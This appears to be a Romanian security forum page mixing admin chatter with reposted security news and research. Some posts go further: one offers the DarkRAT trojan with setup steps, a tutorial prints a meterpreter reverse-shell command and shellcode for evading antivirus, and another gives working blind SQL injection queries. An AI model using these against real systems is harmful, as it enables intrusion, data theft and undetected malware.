Nytro

Nu e de la tema sau forum, sunt niste setari de securitate pe server. Voi discuta cu tex. Cat despre conturi, rezolv astazi daca ajung devreme acasa.

C|Net Download.Com is now bundling Nmap with malware! From: Fyodor <fyodor () insecure org> Date: Mon, 5 Dec 2011 14:35:30 -0800 Hi Folks. I've just discovered that C|Net's Download.Com site has started wrapping their Nmap downloads (as well as other free software like VLC) in a trojan installer which does things like installing a sketchy "StartNow" toolbar, changing the user's default search engine to Microsoft Bing, and changing their home page to Microsoft's MSN. The way it works is that C|Net's download page (screenshot attached) offers what they claim to be Nmap's Windows installer. They even provide the correct file size for our official installer. But users actually get a Cnet-created trojan installer. That program does the dirty work before downloading and executing Nmap's real installer. Of course the problem is that users often just click through installer screens, trusting that download.com gave them the real installer and knowing that the Nmap project wouldn't put malicious code in our installer. Then the next time the user opens their browser, they find that their computer is hosed with crappy toolbars, Bing searches, Microsoft as their home page, and whatever other shenanigans the software performs! The worst thing is that users will think we (Nmap Project) did this to them! I took and attached a screen shot of the C|Net trojan Nmap installer in action. Note how they use our registered "Nmap" trademark in big letters right above the malware "special offer" as if we somehow endorsed or allowed this. Of course they also violated our trademark by claiming this download is an Nmap installer when we have nothing to do with the proprietary trojan installer. In addition to the deception and trademark violation, and potential violation of the Computer Fraud and Abuse Act, this clearly violates Nmap's copyright. This is exactly why Nmap isn't under the plain GPL. Our license (http://nmap.org/book/man-legal.html) specifically adds a clause forbidding software which "integrates/includes/aggregates Nmap into a proprietary executable installer" unless that software itself conforms to various GPL requirements (this proprietary C|Net download.com software and the toolbar don't). We've long known that malicious parties might try to distribute a trojan Nmap installer, but we never thought it would be C|Net's Download.com, which is owned by CBS! And we never thought Microsoft would be sponsoring this activity! It is worth noting that C|Net's exact schemes vary. Here is a story about their shenanigans: http://www.extremetech.com/computing/93504-download-com-wraps-downloads-in-bloatware-lies-about-motivations It is interesting to compare the trojaned VLC screenshot in that article with the Nmap one I've attached. In that case, the user just clicks "Next step" to have their machine infected. And they wrote "SAFE, TRUSTED, AND SPYWARE FREE" in the trojan-VLC title bar. It is telling that they decided to remove that statement in their newer trojan installer. In fact, if we UPX-unpack the Trojan CNet executable and send it to VirusTotal.com, it is detected as malware by Panda, McAfee, F-Secure, etc: http://bit.ly/cnet-nmap-vt According to Download.com's own stats, hundreds of people download the trojan Nmap installer every week! So the first order of business is to notify the community so that nobody else falls for this scheme. Please help spread the word. Of course the next step is to go after C|Net until they stop doing this for ALL of the software they distribute. So far, the most they have offered is: "If you would like to opt out of the Download.com Installer you can submit a request to cnet-installer () cbsinteractive com All opt-out requests are carefully reviewed on a case-by-case basis." In other words, "we'll violate your trademarks and copyright and squandering your goodwill until you tell us to stop, and then we'll consider your request 'on a case-by-case basis' depending on how much money we make from infecting your users and how scary your legal threat is. F*ck them! If anyone knows a great copyright attorney in the U.S., please send me the details or ask them to get in touch with me. Also, shame on Microsoft for paying C|Net to trojan open source software! Cheers, Fyodor Sursa: http://seclists.org/nmap-hackers/2011/5

Alti suporteri de tastatura...

Edit: Am inteles gresit, scuze.

Taci acolo. Muie Steaua.

Nu e nimic rau in a reinventa roata, intotdeauna e loc de o roata mai buna. Felicitari.

Pfff. Isi pune omu o imagine pe site si gata, e spart... Nu e niciun deface.

Cam prostie faza cu steal.cpp. Din C poti atat sa citesti fisiere cat si sa le uploadezi prin FTP sau altceva, si nu e deloc complicat. Si daca e facut totul din C te scapa de orice fel de dependinte. Dar ideea e buna, insa mai dificila e partea cu "infectatul".

http://www.youtube.com/watch?v=HBvIg_w1_Rw

Pff, de maine nu cred ca vor mai fi astfel de probleme. Ii rog pe cei carora le-au disparut conturile sa posteze: 1. Username - Sa isi creeze unul identic (cu membri VIP voi discuta in particular) 2. Link catre un post de pe vechiul cont sau user ID-ul username-ului vechi daca il stie Dar mai bine verific ce alte probleme pot sa apara, pe unde mai sunt foreign keys cu user id-ul vechi. O sa ma ocup diseara de asta daca am timp.

Astept de la HellScream alte probleme in afara de reputatie, semnatura si lista prieteni. Apoi o sa procedez la fel si cu celelalte conturi.

Posteaza si o mica descriere te rog. Nu cred ca are rost sa "ascunzi" link-urile. Mutat la Wireless.

[h=2]iPhone-urile explodeaz?. La propriu[/h]4 decembrie 2011, 11:45 | Autor: Ramona Dragomir Telefoanele inteligente ale Apple pun în pericol de moarte utilizatorii. S?pt?mâna trecut?, pasagerii unui avion au asistat la o întâmplare care i-a l?sat mu?i de uimire. Un iPhone 4 s-a aprins în momentul ateriz?rii începând s? fumege dens, acesta fiind acompaniat de o tent? ro?iatic? a carcasei. La doar câteva zile de la acest indicent, un b?rbat din Brazilia a asistat la o scen? asem?n?toare: telefonul a început s? scoat? fum ?i din el s? sar? scântei. „Smartphone-ul era conectat la priz?, pentru a se înc?rca. Totul s-a petrecut noaptea, când proprietarul dormea", potrivit „The Sun". Tragedia provocat? de un incendiu a putut fi evitat? doar pentru c? utilizatorul a observat scânteile. Piese contraf?cute Speciali?tii în domeniu încearc? s? elucideze cauzele care au dus la producerea acestor incidente. Ei sus?in c? în ambele cazuri, problemele sunt cauzate de utilizarea unor componente contraf?cute: baterii sau alte piese. Sursa: http://www.adevarul.ro/life/viata/iPhone-urile_explodeaza-_La_propriu_0_602939812.html

[h=5]DarkRAT v11.2 PHP RAT[/h]Nu l-am testat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Features : [?] -Restart [?] -Hibernate [?] -Logoff [?] -Open CDROM [?] -Close CDROM [?] -Mouse (0,0) [?] -Block Site [?] -Close process [?] -Delete File [?] -Set IE Home Page [?] -Set Clipboard [?] -Draw on screen [?] -Clean RecycleBin [?] -Block USB Write [?] -Unblock USB Write [?] -Set time [?] -Corrupt File [?] -Delete IE Cookies [?] -Delete IE History [?] -Delete IE Form data [?] -Delete IE Temp files [?] -Turn on monitor [?] -Turn off monitor [?] -Flip screen [?] -Un flipscreen [?] -Start screensaver [?] -Stop screensaver [?] -Mouse Clicker [?] -Swap Mouse - Left [?] -Swap Mouse - Right [?] -Disable Keyboard/Mouse [?] -Enable Keyboard/Mouse [?] -Disable desktop [?] -Enable desktop [?] -Focus desktop [?] -Show clock [?] -Hide clock [?] -Hide notify [?] -Show notify [?] -Mute sound [?] -Suspend proces [?] -Resume proces [?] -Hide taskbar [?] -Show taskbar [?] -Hide icons [?] -Show icons [?] -Change start button text [?] -Lock clipboard [?] -Unlock clipboard [?] -Turn on hidden files [?] -Turn off hidden files [?] -Change background [?] -Enable Taskmanager [?] -Disable Taskmanager [?] -Enable CMD [?] -Disable CMD [?] -Enable Registry [?] -Disable Registry [?] -Enable System Restore [?] -Disable System Restore [?] -Print [?] -Fake BSOD on [?] -Fake BSOD off [?] -Crazy CAPS Lock on [?] -Crazy CAPS Lock off [?] -Fake message [?] -Open program [?] -Open website [?] -Remote desktop [?] -Remote webcam [?] -Process manager [?] -Keylogger [?] -Chat [?] -UDP Flood [?] -PoD [?] -HTTP Flood [?] -Read Clipboard [?] -Filezilla data [?] -Camstasia Licence [?] -Windows Wallpaper Path [?] -SAMP Server Data [?] -Windows Product Key [?] -Firefox Data [?] -Last 25 Sites [?] -Default Browser Path [?] - Login system [?] - Customize your DarkRAT Background. [?] - Greater stability [?] - Icon changer [?] - Unlimited binder [?] - Improved security [?] - Chrome stealer [?] - Delete Clientregistry.blob(steam) Pequeño tutorial: 1- Upload la carpeta phh a tu servidor web 2- Dale permisos 777 (chmod) 3- Ejecuta "Dark RAT.exe" y escribe la direccion de donde subiste la carpeta "php" Ejemplo "http://tuweb.com/php/" 4- Luego dale a conectar y listo el cliente se conectara al servidor web al igual que el server (remoto) de esa forma no es necesario abrir ningun puerto en tu pc Download: http://www.megaupload.com/?d=J0SKO8J0 Fuente PD: Hace falta Framework Sursa: http://www.underc0de.org/foro/index.php?topic=7936.msg29577

[h=3]Chrome & Opera PoC: rapid history extraction through non-destructive cache timing[/h] This is an experimental port of my of my Firefox cache timing script, designed to work in Chrome and Opera. I had no chance to test this version very thoroughly, so I am not yet sure how reliable it will be in the wild. Your feedback is appreciated. Please refer to the top-level page for more. information about the purpose and the design of this tool. A se vedea codul sursa: http://lcamtuf.coredump.cx/cachetime/chrome.html

[h=2]Timing Attacks on CSS Shaders[/h][h=2]Saturday, December 3, 2011[/h] CSS Shaders is a new feature folks from Adobe, Apple, and Opera have proposed to the W3C CSS-SVG Effects Task Force. Rather than being limited to pre-canned effects, such as gradients and drop shadows, CSS Shaders would let web developers apply arbitrary OpenGL shaders to their content. That makes for some really impressive demos. Unfortunately, CSS Shaders has a security problem. To understand the security problem with CSS Shaders, it's helpful to recall a recent security issue with WebGL. Similar to CSS Shaders, WebGL lets developers use OpenGL shaders in their web applications. Originally, WebGL let these shaders operate on arbitrary textures, including textures fetched from other origins. Unfortunately, this design was vulnerable to a timing attack because the runtime of OpenGL shaders can depend on their inputs. Using the shader code below, James Forshaw built a compelling proof-of-concept attack that extracted pixel values from a cross-origin image using WebGL: [INDENT] [FONT=Courier New]for (int i = 0; i <= 1024; i += 1) { // Exit loop early depending on pixel brightness currCol.r -= 1.0; if (currCol.r <= 0.0) { currCol.r = 0.0; break; } } [/FONT] [/INDENT] Timing attacks are difficult to mitigate because once the sensitive data is present in the timing channel it's very difficult to remove. Using techniques like bucketing, we can limit the number of bits an attacker can extract per second, but, given enough time, the attacker can still steal the sensitive data. The best solution is the one WebGL adopted: prevent sensitive data from entering the timing channel. WebGL accomplished this by requiring cross-origin textures to be authorized via Cross-Origin Resource Sharing. There's a direct application of this attack to CSS Shaders. Because web sites are allowed to display content that they are not allowed to read, an attacker can use a Forshaw-style CSS shader read confidential information via the timing channel. For example, a web site could use CSS shaders to extract your identity from an embedded Facebook Like button. More subtly, a web site could extract your browsing history bypassing David Baron's defense against history sniffing. The authors of the CSS Shaders proposal are aware of these issues. In the Security Considerations section of their proposal, they write: However, it seems difficult to mount such an attack with CSS shaders because the means to measure the time taken by a cross-domain shader are limited. Now, I don't have a proof-of-concept attack, but this claim is fairly dubious. The history of timing attacks, including other web timing attacks, teaches us that even subtle leaks in the timing channel can lead to practical attacks. Given that we've seen practical applications of the WebGL version of this attack, it seems quite likely CSS Shaders are vulnerable to timing attacks. Specifically, there are a number of mechanisms for timing rendering. For example, MozBeforePaint and MozAfterPaint provide a mechanism for measuring paint times directly. Also, the behavior of requestAnimationFrame contains information about rendering times. Without a proof-of-concept attack we cannot be completely certain that these attacks on CSS Shaders are practical, but waiting for proof-of-concept attacks before addressing security concerns isn't a path that leads to security. Sursa: Scheme/Host/Port: Timing Attacks on CSS Shaders

Nu stiu, o sa ma uit in baza de date sa vad ce se intampla de fapt. HellScream: Am facut modificari prin baza de date si acum ar trebui cel putin partial sa fie Ok. Spune-mi ce probleme apar, inainte sa fac acelasi lucru si pentru alti membri. Practic ai pierdut datele de pe noul cont, dar ar trebui sa fie ok datele de pe vechiul cont. Acum plm, depinde ce cacat s-a mai "sters" (a disparut) din baza de date.

[h=1]Python tools for penetration testers[/h] If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them. Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs. Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out, because the legal situation of these tools is still a bit unclear in Germany -- even after the decision of the highest court. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side. [h=3]Network[/h] Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection Dirtbags py-pcap: read pcap files without libpcap flowgrep: grep through packet payloads using regular expressions httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist Mallory, man-in-the-middle proxy for testing mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly [h=3]Debugging and reverse engineering[/h] Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH Immunity Debugger: scriptable GUI and command line debugger IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro PyEMU: fully scriptable IA-32 emulator, useful for malware analysis pefile: read and work with Portable Executable (aka PE) files pydasm: Python interface to the libdasm x86 disassembling library PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory diStorm64: disassembler library for AMD64, licensed under the BSD license python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python [h=3]Fuzzing[/h] Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing antiparser: fuzz testing and fault injection API TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer untidy: general purpose XML fuzzer Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer) FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches SMUDGE Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns Fuzzbox: multi-codec media fuzzer Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms WSBang: perform automated security testing of SOAP based web services Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano Fusil: Python library used to write fuzzing programs [h=3]Web[/h] ProxMon: processes proxy logs and reports discovered issues WSMap: find web service endpoints and discovery files Twill: browse the Web from a command-line interface. Supports automated Web testing Windmill: web testing tool designed to let you painlessly automate and debug your web application FunkLoad: functional and load web tester [h=3]Forensics[/h] Volatility: extract digital artifacts from volatile memory (RAM) samples SandMan: read the hibernation file, regardless of Windows version LibForensics: library for developing digital forensics applications TrIDLib, identify file types from their binary signatures. Now includes Python binding [h=3]Malware analysis[/h] pyew: command line hexadecimal editor and disassembler, mainly to analyze malware Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content pyClamAV: add virus detection capabilities to your Python software jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities yara-python: identify and classify malware samples [h=3]PDF[/h] Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF) Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified. Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files pyPDF: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt... PDFMiner: extract text from PDF files python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support [h=3]Misc[/h] InlineEgg: toolbox of classes for writing small assembly programs in Python Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging RevHosts: enumerate virtual hosts for a given IP address simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools Hachoir: view and edit a binary stream field by field [h=3]Other useful libraries and tools[/h] IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system Beautiful Soup: HTML parser optimized for screen-scraping matplotlib: make 2D plots of arrays Mayavi: 3D scientific data visualization and plotting RTGraph3D: create dynamic graphs in 3D Twisted: event-driven networking engine Suds: lightweight SOAP client for consuming Web Services M2Crypto: most complete OpenSSL wrapper NetworkX: graph library (edges, nodes) pyparsing: general parsing module lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language Pexpect: control and automate other programs, similar to Don Libes `Expect` system Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython PyQt and PySide: Python bindings for the Qt application framework and GUI library For more libaries, please have a look at PyPI, the Python Package Index. Sursa: Dirk Loss: Python tools for penetration testers

Indexed blind SQL injection From: Nam Nguyen Date: Sat, 3 Dec 2011 08:49:37 -0800 Indexed blind SQL injection From: Nam Nguyen <namn () bluemoon com vn> Date: Sat, 3 Dec 2011 08:49:37 -0800 =========================== Indexed blind SQL injection =========================== :Author: gamma95 <gamma95 [at] gmail> and his minions :Date: December 03, 2011 Time based blind SQL attack suffers from low bit/request ratio. Each request produces only one valuable bit of information. This paper describes a tweak that produces higher yield at the expense of longer runtime. Along the way, some issues and notes of applicability are also discussed. Background ++++++++++ Time based blind SQL injection attack is probably the most well-known technique in the planet. The method works by analyzing the time difference in various queries. Because query execution time is a side effect of a query, no visible output is required for this method to succeed. For example, a query could request that the DBMS to sleep for 10 seconds if the first character of the username is ``A``. Usually, time based technique go hand in hand with binary search. Instead of asking if the first character is ``1``, then ``2``, then ``3``, it could partition the possible values into two ranges (say from ``0`` to ``4`` and ``5`` to ``9``) and ask if the first character is less than ``5``. Depending on the result, it picks out the more likely range and repeats the process until there is only one possible value. This effectively puts a logarithmic bound on number of requests to the DBMS. In other words, each request gives us one bit of information. Increasing the usable bit/request ratio +++++++++++++++++++++++++++++++++++++++ Due to low bit/request ratio, an attack attempt usually leaves behind too many requests in access log. This is undesirable. A better approach could be to encode the correct value into query execution time itself. For example, if we know the value is a number from 0 to 9, we could ask DBMS to sleep for that many seconds straight. In this case, one request carries more than 3 bits of usable information. This is the principal idea behind our tweak. Indexed time based attack +++++++++++++++++++++++++ To encode more bits into the execution time, we must work with variable numeric delay values. Therefore, we need two things: + A measurable delay interval. Too short the interval and network latency could negatively affect our measurement. Too long the delay will also waste our time. + And its mapping to target values. A delay of one second could mean character ``A`` or it could also mean some other value, depending on the possible domain. These necessitate an array-like index search. Say, if our domain is ten (character) values from ``0`` to ``9``, then we can easily combine them into an array like shown below. :: 1 2 3 4 5 6 7 8 9 10 (index) | | | | | | | | | | v v v v v v v v v v +---+---+---+---+---+---+---+---+---+---+ | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | (value) +---+---+---+---+---+---+---+---+---+---+ Given a random character, we can tell in one request if it is in this set, and if it is, what specific character it actually is. The way to do that is by delaying query time by the index of the character. If the input character is not in the set, there will be no delay. If it is, its index is determinable from the sleep time. An example ++++++++++ Suppose we are trying to grab version information from a **MySQL** server. Possible characters include 0-9 and period. Observe the execution time. :: select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (6.04 sec) # index 6, value '5' select sleep(find_in_set(mid(@@version, 2, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (11.00 sec) # index 11, value '.' select sleep(find_in_set(mid(@@version, 3, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (2.00 sec) # index 2, value '1' ... Each request gives us exactly one character (not bit). Notes of applicability ++++++++++++++++++++++ Adjusting sleep time ==================== Faster sleep time is easily achievable by multiplying the index with some factor smaller than 1. For example, we can sleep half the time as before:: select sleep(0.5 * find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (3.00 sec) # index 6, value '5' Similarly, longer sleep time can use factors greater than 1. Guarding against network latency ================================ Time based attack generally works best in a fast and reliable networked environment. Small jitters in latency could skew the measurements and affect end result. However, this technique we are describing here could be modified to support network latency. The idea is that since sleeping time is a calculated number, we could add to it a fixed amount of time for latency, or prepend some invalid characters (such as ``a`` when the domain is 0-9) in the domain set. :: select sleep(find_in_set(mid(@@version, 1, 1), 'a,a,a,a,0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (10.00 sec) # index 10, value '5' We can also sprinkle invalid characters in between valid characters to manually adjust amount of sleeping time. Picking an acceptable domain ============================ The set of possible values should be carefully picked to match the value that one expects. Wide domain (more values) has a better chance of catching the input, but it requires a longer sleep time on average. Narrow domain (less values) has slimmer chance to catch the input, but it generally finishes faster on average. Some web frameworks enforce a maximum execution time. A query that takes more than, say, 30 seconds will be prime target for an early termination (and possibly logging). Therefore, picking out an acceptable domain is not only an optimization but sometimes a necessity. Using other functions ===================== ``find_in_set`` is only one of the string search functions that MySQL supports. One can also use other functions such as ``instr``, ``locate``, and ``position``. Sleeping in ``WHERE`` clause ============================ Most of the time, the injection point is in a ``WHERE`` clause. Because the ``WHERE`` clause is tested against all candidate rows, we better make sure that there is only **one** candidate. We can do that by making sure the table scan produces one row. Otherwise, our sleep measure will be multiplied up by the number of candidates. :: create table test (a int primary key, b char(16)); insert into test values(1, 'abcd'); insert into test values(2, 'zyxw'); select count(*) from test; +----------+ | count(*) | +----------+ | 2 | +----------+ # we have 2 rows in table test select * from test where sleep(locate(mid(@@version, 1, 1), '0123456789.')); Empty set (12.00 sec) # here we sleep for 12 seconds because all (2) rows are tested select * from test where a=1 and sleep(locate(mid(@@version, 1, 1), '0123456789.')); Empty set (6.00 sec) # here we sleep for 6 seconds because only one row is tested Conclusion ++++++++++ This paper described a small tweak to the well-known time based SQL injection technique. The principle behind the increase in bit/request ratio is encoding more information in the query execution time. This is done with index based array search functions such as ``find_in_set``. The desirably smaller number of requests comes at the expense of generally longer execution time. This paper also discussed about some technical concerns that one must pay close attention to when employing the technique. Minute aspects such as table scan, applicable value domain, network latency, and amount of sleep time are at the top list to watch out for. Acknowledgement +++++++++++++++ Thanks go to Nam Nguyen for his early review and support. -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn Sursa: Full Disclosure: Indexed blind SQL injection

[h=2]Writing Self-modifying Code Part 1: C Hello world with RWX and in-line assembly[/h] November 21st, 2011|By: aking To follow along with this tutorial, download all source files here In the first part of this tutorial, we’ll be making a basic C scaffold and getting read, write, and execute permissions for the memory section. This way we’ll be able to have some self-modifying code in the following tutorials. We’ll begin with a hello.c, hellodll.c, hellodll.h, and makefile. Readers should be able to use an Ubuntu virtual machine and simply: apt-get install build-essential mingw32 in order to follow along. The hello.c file is a simple dll loader. The hellodll.c is a simple dll where we will insert some assembly structures or none at all to confirm our setup is working properly. We can then hook up a debugger and step through our simple example to see what changes when we modify the code. GDB is open source, freely available, cross platform, and cross architecture. In the tutorial we’ll use Immunity Debugger since it has a much cleaner and more intuitive interface. It is easily installable in wine. You need full python 2.7. If you have problems check out Google’s responses for “wine msiexec”. Let’s get started by downloading the example code and test compiling it. The video here is one chunk. That’s the beauty of pause. You can either read it all then get some clarification from the video, or exercise your right to pause. Let’s take a look at the source files: DOWNLOAD SOURCE FILES ZIP HERE If we take a look at the source files, hello.c does little more than call LoadLibrary and call the first exported function in the Dll. The reason we use this approach is that many anti-virus products won’t detect malicious code dropped inside of a Dll. They do detect some similar code when dropped directly behind a simple PE header. If the goal is going to be to write self modifying code we’re going to need to get read, write, and execute permissions. There are a lot of ways to do this. We could use any number of functions to change the permissions on a memory section or process. Let’s do this for a memory section since process wide DEP can be force enabled. The MSDN tells us that the VirtualProtect function is portable across all versions of windows and we can set permissions to whatever we want. Let’s use the raw values instead of symbolic constants to make the code more portable even if it’s a little less readable. Some example code would be: int vpretval = VirtualProtect( baseaddress, memlen, newprotect, &oldprotect); But how are we going to get the size of the code? This could be troublesome. Setting the size statically could be a bad idea. Let’s insert a marker function so we can do a little simple arithmetic and have a functional VirtualProtect call. If you want to find out if this is working you can print out some debugging information. Once you’re sure it’s working, let’s do away with that pesky console window by changing our makefile a little bit. FROM: $(CC) -o loader.exe loader.o $(DLLNAME).dll TO: $(CC) -o loader.exe -mwindows loader.o $(DLLNAME).dll Simple payloads dropped behind an executable header are pretty easily detected. This can be demonstrated by generating a malicious binary with the following command: msfpayload windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.1.1 x>test.exe and scanning with http://www.virustotal.com. We could use an off the shelf encoder that’s built in to metasploit. Shikata is fairly effective and becomes more effective with higher iterations. Eventually the vendors will probably start detecting just the encoders though. For the purposes of this tutorial we’ll stick with Avast and AVG since they are free, and one detects some malicious shell-code when simply dropped in to a function of a Dll. So we were detected using the Metasploit built-in executable generator the vast majority of the time. Our goal is the ability to build custom APT software as a demonstration for penetration testing contracts anyway right? Now let’s take a look at our test compiled files. After entering the project directory and running make we can attach Immunity Debugger, breakpoint on our GetProcAddress call, then step in to our call eax. Now we’re in the DLL. This first part is a common preamble and will differ slightly depending on the arguments we pass in to our function. After that we can see our NOPs and return. Let’s take a look at our memory permissions to make sure our VirtualProtect call worked. I did include a debug flag detection, but it’s not in the makefile. That’s a really simple exercise to get you used to mingw32 and makefiles. Hint: -D and ifdef. This is all pretty simple. Let’s step it up a bit and drop in some shell-code. Inserting NOPs is as simple as dropping in: asm( “nop;” “nop;” ); Just repeat the “nop;” line for as many iterations as you need. Very simple. You could automate this part of the process to put in as many bytes as you need for the shellcode and drop it in directly. Of course, that would eliminate the next exercise…so let’s keep reading. Do remember that in-line assembly each line has to be quoted and end in a ;. Now that we’ve been detected by both products, let’s try putting some shellcode inside a function. A simple procedure for this is to use the common and freely available tool objdump to get the assembly back from the opcodes. We accomplish this by copying the shell-code generated by the metasploit framework into a .bin file and dumping it with objdump using the following steps. First copy all this: fce8890000006089e531d2648b52308b520c8b52148b72280f b74a2631ff31c0ac3c617c022c20c1cf0d01 c7e2f052578b52108b423c01d08b407885c0744a01d0508b48 188b582001d3e33c498b348b01d631ff31c 0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d36 68b0c4b8b581c01d38b048b01d089442424 5b5b61595a51ffe0585f5a8b12eb865d683332000068777332 5f54684c772607ffd5b89001000029c4545 06829806b00ffd5505050504050405068ea0fdfe0ffd589c73 1db53680200115c89e66a10565768c2db376 7ffd5535768b7e938ffffd55353576874ec3be1ffd55789c76 8756e4d61ffd568636d640089e357575731f6 6a125956e2fd66c744243c01018d442410c600445450565656 46564e565653566879cc3f86ffd589e04e5 646ff306808871d60ffd5bbf0b5a25668a695bd9dffd53c067 c0a80fbe07505bb4713726f6a0053ffd5 in to a .bin file with your hex editor of choice. Winhex is free and runs under wine. Unlike a lot of the free hex editors for linux that won’t increase the length of a file or support pasting very well, this one just works. Alternately, you could convert it to hex and write it to disk with a simple python script like so: Click here to download python/shellcodetxt2bin.py This is simpler, but all of the text representation must be on one line. If you want multiple line breaks and msfpayload .c output you need to look in to regex replacing \x, \n, and possibly \r. This is the same for ImmDbg binary copies. We have to fix up jumps in order to get this to compile since mingw32 uses labels and doesn’t recognize the offsets. So we use this command to tell objdump 1)disassemble the whole thing, 2)it’s just a raw binary file, 3)architecture, 4)assembly code format, and 5) filename. objdump -D -b binary -m i386 -M intel shellcode.bin You have to fix up the jumps from relative offsets to jump labels. If you’re exact byte-code doesn’t match, it could be the compiler using regular jumps where short jumps used to be or something very similar. See if you can do the fix-ups yourself. After fixing up the shell-code for our purposes it goes from looking something like this: Click here to download shellcodeexample/shellcodedump.txt to looking more like this:———————————————- Click to download shellcodeexample/shellcodefixup.txt Now we simply drop this shell-code in to a function and see what happens. The example code gets detected by Avast. It does not get detected by AVG. If it doesn’t get detected by either, some of your jumps got compiled a little differently. We could have shortcut this by compiling with a bunch of NOPs and dropping it in with a hex editor. That last part was a good exercise anyway. Here’s the screenshot that shows this shellcode getting detected from within a function: We’re getting Read,Write, and Execute at load time to simplify the disassembly. We’ll change that in the next tutorial when we get in to extended assembly. Let’s take a look at what happens now. We got passed most anti-virus on http://www.virustotal.com with this approach, but we want to do a little more. We need to bypass Avast. We could insert some NOPs and our jumps would adjust automatically since we’re compiling from source. In order to find out what part of the shellcode actually triggers the definition, we can do something like replacing sections of instructions with garbage and scanning a bunch of files. That doesn’t really scale though and is kind of like fuzzing the anti-virus system. That’s why we’re going to make a custom encoding and decoding section. So, hopefully you found it interesting. We’ll talk again soon. Thanks for listening. Sursa: http://resources.infosecinstitute.com/writing-self-modifying-code-part-1/

XSSer v1.6 -beta- aka "Grey Swarm!" released. From: psy <root () lordepsylon net> Date: Thu, 01 Dec 2011 00:45:12 +0100 Hi list, There is released a new version of *XSSer* (v1.6-beta-) - the cross site scripter framework. Take a look to the XSSer website to see new features implemented, screenshots, documentation, etc... http://xsser.sf.net You can download original code directly from here: http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download Or update your copy from the XSSer svn repository: $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser Also, you have on the main website some pre-compiled packages (ArchLinux, Debian/Ubuntu, Gentoo, etc..) "Are you ready for the Grey Swarm!?" Happy cross hacking. psy. Sursa: Full Disclosure: XSSer v1.6 -beta- aka "Grey Swarm!" released.

O sa ma uit in baza de date sa vad daca se poate fara foarte mult chin. Si nu ma refer la reputatie, nu e o problema asta, ci la posturi.

A bit away from Kernel execution By ar1vr (01/12/2011) picturoku.blogspot.com Whitepaper called A Bit Away From Kernel Execution. A 'write-what-where' kernel memory overwrite tale. Download: http://dl.packetstormsecurity.net/papers/general/kernel-execution.pdf

